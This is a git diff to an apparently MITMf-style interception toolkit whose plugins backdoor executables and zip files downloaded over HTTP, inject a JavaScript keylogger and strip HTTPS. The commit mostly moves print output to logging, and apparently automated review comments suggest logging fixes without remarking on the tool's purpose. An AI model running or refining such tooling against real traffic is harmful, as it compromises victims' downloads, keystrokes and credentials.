diff --git a/plugins/FilePwn.py b/plugins/FilePwn.py
index 6f6314e..a106385 100644
--- a/plugins/FilePwn.py
+++ b/plugins/FilePwn.py
@@ -25,7 +25,6 @@ class FilePwn(Plugin):
 optname = "filepwn"
 implements = ["handleResponse"]
 has_opts = False
- log_level = logging.DEBUG
 desc = "Backdoor executables being sent over http using bdfactory"
 def convert_to_Bool(self, aString):
@@ -160,17 +159,15 @@ class FilePwn(Plugin):
 return result
 except Exception as e:
- print 'Exception', str(e)
 logging.warning("EXCEPTION IN binaryGrinder %s", str(e))
 return None
 def zipGrinder(self, aZipFile):
 "When called will unpack and edit a Zip File and return a zip file"
- print "[*] ZipFile size:", len(aZipFile) / 1024, 'KB'
+ logging.info("ZipFile size: %s KB" % (len(aZipFile) / 1024))
 if len(aZipFile) > int(self.userConfig['ZIP']['maxSize']):
- print "[!] ZipFile over allowed size"
 logging.info("ZipFIle maxSize met %s", len(aZipFile))
 return aZipFile
@@ -194,20 +191,20 @@ class FilePwn(Plugin):
 logging.info('Encrypted zipfile found. Not patching.')
 return aZipFile
- print "[*] ZipFile contents and info:"
+ logging.info("ZipFile contents and info:")
 for info in zippyfile.infolist():
- print "\t", info.filename, info.date_time, info.file_size
+ logging.info("\t%s %s %s" % (info.filename, info.date_time, info.file_size))
 zippyfile.extractall(tmpDir)
 patchCount = 0
 for info in zippyfile.infolist():
- print "[*] >>> Next file in zipfile:", info.filename
+ logging.info(">>> Next file in zipfile: %s" % info.filename)
 if os.path.isdir(tmpDir + '/' + info.filename) is True:
- print info.filename, 'is a directory'
+ logging.info('%s is a directory' % info.filename)
 continue
 #Check against keywords
 keywordCheck = False
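Review bot: Archive member names are written to the log unescaped in the third FilePwn.py hunk: `logging.info("\t%s %s %s" % (info.filename, info.date_time, info.file_size))` and the `>>> Next file in zipfile` line both format `info.filename`, which is read from the archive being processed, so a name containing newlines or control characters can split or forge log records. Passing the values as logger arguments with `%r` for the name, e.g. `logging.info("\t%r %s %s", info.filename, info.date_time, info.file_size)`, escapes it and matches the unchanged `logging.warning("EXCEPTION IN binaryGrinder %s", str(e))` in the previous hunk. The same eager `%` formatting is introduced in the later zipGrinder hunks and in handleResponse, where `content_header` is likewise taken from an HTTP header. zipGrinder's body continues outside this hunk.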
@@ -223,8 +220,7 @@ class FilePwn(Plugin):
 continue
 if keywordCheck is True:
- print "[!] Zip blacklist enforced!"
- logging.info('Zip blacklist enforced on %s', info.filename)
+ logging.info('Zip blacklist enforced on %s' % info.filename)
 continue
 patchResult = self.binaryGrinder(tmpDir + '/' + info.filename)
@@ -232,15 +228,12 @@ class FilePwn(Plugin):
 if patchResult:
 patchCount += 1
 file2 = "backdoored/" + os.path.basename(info.filename)
- print "[*] Patching complete, adding to zip file."
 shutil.copyfile(file2, tmpDir + '/' + info.filename)
- logging.info("%s in zip patched, adding to zipfile", info.filename)
+ logging.info("%s in zip patched, adding to zipfile" % info.filename)
 else:
- print "[!] Patching failed"
- logging.info("%s patching failed. Keeping original file in zip.", info.filename)
+ logging.info("%s patching failed. Keeping original file in zip." % info.filename)
- print '-' * 10
 if patchCount >= int(self.userConfig['ZIP']['patchCount']): # Make this a setting.
 logging.info("Met Zip config patchCount limit.")
@@ -250,12 +243,12 @@ class FilePwn(Plugin):
 zipResult = zipfile.ZipFile(tmpFile, 'w', zipfile.ZIP_DEFLATED)
- print "[*] Writing to zipfile:", tmpFile
+ logging.debug("Writing to zipfile: %s" % tmpFile)
 for base, dirs, files in os.walk(tmpDir):
 for afile in files:
 filename = os.path.join(base, afile)
- print '[*] Writing filename to zipfile:', filename.replace(tmpDir + '/', '')
+ logging.debug('[*] Writing filename to zipfile: %s' % filename.replace(tmpDir + '/', ''))
 zipResult.write(filename, arcname=filename.replace(tmpDir + '/', ''))
 zipResult.close()
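Review bot: In the last hunk on this line the new debug message keeps the `[*]` console prefix that every other converted message dropped, and it computes `filename.replace(tmpDir + '/', '')` a second time only for the log. Binding the value once, `arcname = filename.replace(tmpDir + '/', '')`, then `logging.debug('Writing filename to zipfile: %r', arcname)` and `zipResult.write(filename, arcname=arcname)`, guarantees the logged name is the one actually written. The enclosing function starts outside the hunk.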
@@ -273,12 +266,14 @@ class FilePwn(Plugin):
 content_header = request.client.headers['Content-Type']
 if content_header in self.zipMimeTypes:
- print "[+] Detected supported zip file type!"
+ logging.info("%s Detected supported zip file type!" % request.client.getClientIP())
 bd_zip = self.zipGrinder(data)
- return {'request':request,'data':bd_zip}
+ if bd_zip:
+ logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
+ return {'request':request,'data':bd_zip}
 elif content_header in self.binaryMimeTypes:
- print "[+] Detected supported binary type!"
+ logging.info("%s Detected supported binary type!" % request.client.getClientIP())
 fd, tmpFile = mkstemp()
 with open(tmpFile, 'w') as f:
 f.write(data)
@@ -288,9 +283,9 @@ class FilePwn(Plugin):
 if patchb:
 bd_binary = open("backdoored/" + os.path.basename(tmpFile), "rb").read()
 os.remove('./backdoored/' + os.path.basename(tmpFile))
- print "[*] Patching complete, forwarding to user."
+ logging.info("%s Patching complete, forwarding to client" % request.client.getClientIP())
 return {'request':request,'data':bd_binary}
 else:
- print "[-] File is not of supported Content-Type: %s" % content_header
+ logging.debug("%s File is not of supported Content-Type: %s" % (request.client.getClientIP(), content_header))
 return {'request':request,'data':data}
\ No newline at end of file
diff --git a/plugins/Inject.py b/plugins/Inject.py
index 82ce883..92203cf 100644
--- a/plugins/Inject.py
+++ b/plugins/Inject.py
@@ -8,7 +8,6 @@ class Inject(CacheKill,Plugin):
 optname = "inject"
 implements = ["handleResponse","handleHeader","connectionMade"]
 has_opts = True
- log_level = logging.DEBUG
 desc = "Inject arbitrary content into HTML content"
 def initialize(self,options):
@@ -33,7 +32,7 @@ class Inject(CacheKill,Plugin):
 self.dtable = {}
 self.count = 0
 self.mime = "text/html"
- print "[*] %s plugin online" % self.name
+ print "[*] Inject plugin online"
 def handleResponse(self,request,data):
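Review bot: The new `Patching complete, forwarding to client` message in the zip branch is emitted whenever `zipGrinder` returns a non-empty value, but the earlier hunks show zipGrinder returning the original `aZipFile` unchanged for oversized and encrypted archives, so the log records a patch that did not take place. A neutral message such as `logging.info("%s Zip processed, forwarding to client", request.client.getClientIP())` keeps the record accurate, or zipGrinder could report whether any member was modified. handleResponse starts outside the hunk.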
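Review bot: The banner in the second Inject.py hunk still goes through `print` although the rest of this commit moves console output to `logging`, so this line bypasses the configured log level and handlers; `logging.info("Inject plugin online")` would be consistent. With the name hard-coded, a subclass that calls `Inject.initialize` (jskeylogger.py does so in this commit) will presumably emit this banner as well as its own. The enclosing method starts outside the hunk, so this assumes the line belongs to `initialize`.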
diff --git a/plugins/jskeylogger.py b/plugins/jskeylogger.py
index ab8f3c6..c77c339 100644
--- a/plugins/jskeylogger.py
+++ b/plugins/jskeylogger.py
@@ -10,7 +10,7 @@ class jskeylogger(Inject, Plugin):
 def initialize(self,options):
 Inject.initialize(self, options)
 self.html_payload = self.msf_keylogger()
- print "[*] %s online" % self.name
+ print "[*] %s plugin online" % self.name
 def msf_keylogger(self):
 #Stolen from the Metasploit module http_javascript_keylogger
diff --git a/sslstrip/ServerConnection.py b/sslstrip/ServerConnection.py
index b185eed..03b6995 100644
--- a/sslstrip/ServerConnection.py
+++ b/sslstrip/ServerConnection.py
@@ -55,21 +55,19 @@ class ServerConnection(HTTPClient):
 t = line.split('=')
 dict[t[0]] = t[1]
 return dict
-
- def getLogLevel(self):
- return logging.DEBUG
 def getPostPrefix(self):
 return "POST"
 def sendRequest(self):
- logging.log(self.getLogLevel(), "%s Sending Request: %s %s%s" % (self.client.getClientIP(), self.command, self.headers['host'], self.uri))
+ if self.command == 'GET':
+ logging.info("%s Sending Request: %s %s" % (self.client.getClientIP(), self.command, self.headers['host']))
 self.plugins.hook()
 self.sendCommand(self.command, self.uri)
 def sendHeaders(self):
 for header, value in self.headers.items():
- #logging.log(self.getLogLevel(), "Sending header: %s : %s" % (header, value))
+ logging.debug("Sending header: %s : %s" % (header, value))
 self.sendHeader(header, value)
 self.endHeaders()
@@ -106,7 +104,7 @@ class ServerConnection(HTTPClient):
 self.transport.write(self.postData)
 def connectionMade(self):
- #logging.log(self.getLogLevel(), "HTTP connection made.")
+ logging.debug("HTTP connection made.")
 self.plugins.hook()
 self.sendRequest()
 self.sendHeaders()
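Review bot: The re-enabled `logging.debug("Sending header: %s : %s" % (header, value))` in sendHeaders writes every header value verbatim, which would include any Cookie or Authorization values, and the last ServerConnection.py hunk does the same for whole response bodies with `"Read from server:\n" + data`. Both strings are built before the logger checks its level, so the formatting and the body-sized concatenation are paid on every request even with debug disabled, and raw content can carry newlines into the log. Passing arguments lazily and bounding what is recorded, e.g. `logging.debug("Sending header: %s (%d bytes)", header, len(value))` and `logging.debug("Read from server: %d bytes", len(data))`, avoids both problems.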
@@ -115,7 +113,7 @@ class ServerConnection(HTTPClient):
 self.sendPostData()
 def handleStatus(self, version, code, message):
- #logging.log(self.getLogLevel(), "Got server response: %s %s %s" % (version, code, message))
+ logging.debug("Got server response: %s %s %s" % (version, code, message))
 self.client.setResponseCode(int(code), message)
 def handleHeader(self, key, value):
@@ -166,7 +164,7 @@ class ServerConnection(HTTPClient):
 logging.debug("Decompressing content...")
 data = gzip.GzipFile('', 'rb', 9, StringIO.StringIO(data)).read()
- #logging.log(self.getLogLevel(), "Read from server:\n" + data)
+ logging.debug("Read from server:\n" + data)
 data = self.replaceSecureLinks(data)